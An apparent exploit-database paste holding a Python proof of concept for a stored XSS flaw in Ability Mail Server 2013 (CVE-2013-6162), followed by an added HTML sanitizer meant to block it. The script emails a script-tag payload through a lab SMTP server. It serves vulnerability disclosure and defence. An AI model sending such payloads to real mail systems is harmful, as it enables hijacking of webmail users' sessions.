AndrewHaxalot

Ability Mail Server 2013 Stored XSS

Dec 18th, 2013
#!/usr/bin/env python

'''
Exploit Title: Ability Mail Server 2013 Stored XSS
Date: 12/20/2013
Exploit Author: David Um
Vendor Homepage: http://www.code-crafters.com/
Software Link: http://download.code-crafters.com/ams.exe
Version: 3.1.1
Tested on: Windows Server 2003 SP2
CVE : CVE-2013-6162
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
'''

import smtplib

# Test mailbox; the message is sent from this account to itself.
email_addr = 'user@hack.local'

# Build the message: headers, a blank line, then an HTML body carrying the script element.
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'

# Connect to the lab mail server's SMTP port.
s = smtplib.SMTP('192.168.58.140', 25)

# Authenticate as the test user and deliver the message.
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()
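
The mitigation side of the issue described above, as an added example that is not part of the original paste or of Ability Mail Server: an allowlist sanitizer a webmail view could apply to a message body before rendering it. The tag and scheme allowlists, the names `MailSanitizer` and `render_safe_body`, the UTF-8 decoding and the sample address are assumptions made for illustration.

```python
from email import message_from_string
from html import escape
from html.parser import HTMLParser

# Added example: these allowlists are an assumed policy, not Ability Mail Server's.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}                  # no on* handlers, no style
SAFE_SCHEMES = ("http://", "https://", "mailto:")
DROP_CONTENT = {"script", "style"}               # element and its body are discarded

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        if self.skip or tag not in ALLOWED_TAGS:
            return                               # tag dropped; its text is still escaped
        kept = ""
        for name, value in attrs:
            safe = (value or "").strip().lower().startswith(SAFE_SCHEMES)
            if name in ALLOWED_ATTRS.get(tag, ()) and safe:
                kept += ' %s="%s"' % (name, escape(value.strip(), quote=True))
        self.out.append("<%s%s>" % (tag, kept))
    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def render_safe_body(raw_message):
    """Return embeddable markup for the first body part of an RFC 822 message."""
    for part in message_from_string(raw_message).walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        if part.get_content_type() != "text/html":
            return escape(body)                  # plain text: escape everything
        parser = MailSanitizer()
        parser.feed(body)
        parser.close()
        return "".join(parser.out)
    return ""

SAMPLE = ("From: user@example.test\nSubject: XSS\nContent-type: text/html\n\n"  # constructed sample
          '<p onclick="x()">Hi</p><script>alert("XSS")</script><b>bye</b>')
```

An unterminated `<script>` leaves the parser in skip mode, so everything after it is dropped rather than rendered.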